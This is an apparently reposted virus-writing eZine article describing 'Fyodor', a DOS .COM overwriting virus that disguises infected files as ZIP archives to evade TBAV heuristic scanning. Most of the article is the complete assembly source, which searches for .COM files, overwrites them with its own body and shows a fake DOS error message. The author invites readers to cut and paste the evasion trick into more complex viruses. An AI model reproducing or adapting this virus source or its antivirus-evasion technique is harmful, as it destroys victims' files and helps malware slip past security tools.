Copy Link
Add to Bookmark
Report

SLAM2.024: A Funky New Anti-Heuristic Method - The Fyodor Virus

eZine's profile picture
Published in 
Slam
 · 2 years ago

The Fyodor Virus
by Gothmog/DHA

This virus uses an interesting anti-heuristic technique - infected files masquerade as .ZIP format files. To do this, the virus starts with a dummy 22-byte ZIP file header, which disassembles to do-nothing instructions which fortunately do not crash the processor:

[cs]:0100 50            PUSH    AX 
[cs]:0101 4B DEC BX
[cs]:0102 050600 ADD AX,0006
[cs]:0105 0000 ADD [BX+SI],AL
[cs]:0107 0000 ADD [BX+SI],AL
[cs]:0109 0000 ADD [BX+SI],AL
[cs]:010B 0000 ADD [BX+SI],AL
[cs]:010D 0000 ADD [BX+SI],AL
[cs]:010F 0000 ADD [BX+SI],AL
[cs]:0111 0000 ADD [BX+SI],AL
[cs]:0113 90 NOP
[cs]:0114 0000 ADD [BX+SI],AL


To a ZIP processor, the virus is stored as a ZIP comment, and the actual archive contains no files. In any case, this technique renders the virus invisible to TBAV, which flags only the `p' flag, for a packed file...

While this virus is nothing more than a featureless overwriter (I was testing the idea, so wrote it up _real_ quick...) the technique can easily be added to more complex viruses - just cut and paste!

==========================================================[ code begins ]== 

.model tiny
.code

org 100h

virusStart:

db 50h, 4Bh, 05h, 06h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 90h, 00h, 00h


findFirst:

filemask db '*.com', 00h, 00h

mov byte ptr virusstart + 1, 'K'
mov ah, 4Eh

findFile:
xor cx, cx
mov dx, offset filemask
int 21h
jc writeMsg

openFile:
mov ax, 3D00h
mov dx, 9Eh
int 21h
xchg bx, ax

readFile:
mov ah,3fh
mov cx, 2
mov dx, offset buffer
int 21h

closeFile:
mov ah,3eh
int 21h

checkInfected:
cmp word ptr[buffer], 'KP'
jnz OpenFileAgain
mov ah,4fh
jmp findFile

Virus_Name db 'fyodor'

openFileAgain:
mov ax,3d02h
mov dx,9eh
int 21h
xchg bx,ax

infectFile:
mov ah, 40h
mov cx, offset virusEnd - offset virusStart
mov dx, offset virusStart
int 21h

closeFileAgain:
mov ah,3eh
int 21h

writeMsg:
mov dx, offset msgerror
mov ah,09h
int 21h

exit:
int 20h

msgerror db 'Bad command or file name', 13, 10, '$'

virusEnd:

buffer dw ?

end virusStart

; ============================================================[ code ends ]==

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT